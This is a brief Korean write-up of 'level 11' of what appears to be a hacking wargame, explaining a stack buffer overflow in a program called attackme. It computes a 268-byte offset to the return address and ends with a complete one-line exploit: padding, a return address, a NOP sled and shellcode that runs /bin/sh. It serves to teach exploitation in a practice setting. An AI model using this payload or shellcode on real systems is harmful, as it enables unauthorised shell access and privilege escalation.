level 11

버퍼오버플로우를 사용한다!

ebp는 0xbfffe668

strcpy로 처음 값이 써지는 부분: 0xbfffe560

0xbfffe668-0xbfffe560=264

264+4=268

268byte 다음의 4byte가 RET가 써지는 부분!

./attackme `python -c 'print "A"*268+"\xe8\xf9\xff\xbf"+"\x90"*2000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`